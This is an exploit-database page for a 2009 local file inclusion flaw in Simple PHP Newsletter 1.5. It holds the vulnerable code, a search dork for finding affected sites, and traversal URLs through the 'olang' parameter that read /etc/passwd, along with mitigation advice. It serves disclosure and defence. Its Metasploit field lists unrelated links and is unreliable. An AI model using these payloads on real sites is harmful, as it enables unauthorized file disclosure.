header-logo
Suggest Exploit
vendor:
Simple PHP Newsletter
by:
ahmadbady
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Simple PHP Newsletter
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: CVE not provided
CPE: a:simple_php_newsletter:simple_php_newsletter:1.5
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2023-22024/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-20212/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-24834/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-27395/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-22325/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-3326/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/suse-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/apple-osx-cups-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/debian-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/debian-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/suse-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-1825/https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=2https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=3https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=4https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=2
Other Scripts:
Platforms Tested:
2009

Simple PHP Newsletter 1.5 Local File Include Vulnerability

The Simple PHP Newsletter 1.5 script is vulnerable to local file inclusion. The vulnerability exists in the 'mail.php' and 'mailbar.php' files, where the 'olang' parameter is not properly sanitized before being used in a require statement, allowing an attacker to include arbitrary local files. By manipulating the 'olang' parameter, an attacker can include sensitive files, such as the '/etc/passwd' file, which may contain hashed passwords and other system information.

Mitigation:

To mitigate this vulnerability, ensure that user-supplied input is properly sanitized and validated before being used in file inclusion statements. Additionally, it is recommended to restrict file inclusion to a whitelist of allowed files or directories.
Source

Exploit-DB raw data:

                                   --:local file include:--
---------------------------------  
script:Simple PHP Newsletter 1.5
   
----------------------------------------------
download from:http://quirm.net/download/23/
   
----------------------------------------------

...............................................
vul:/mail.php line 11:

if(isset($olang)) 
{
require("lang/".$olang); line 11
-------------------------------------------
vul:/mailbar.php line 5:

<?php
include("config.inc.php");
if(isset($olang))
{
require("lang/".$olang); line 5
-------------------------------------------


----------------------------------------------------

dork:"Powered by Simple PHP Text newsletter"
----------------------------------------------------

xpl:

http://127.0.0.1/path/mail.php?olang=../../../../../../etc/passwd

http://127.0.0.1/path/mailbar.php?olang=../../../../../../etc/passwd

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from:[iran]
---------------------------------------------------

# milw0rm.com [2009-01-16]

Navigation

Suggest Exploit

Services By CQR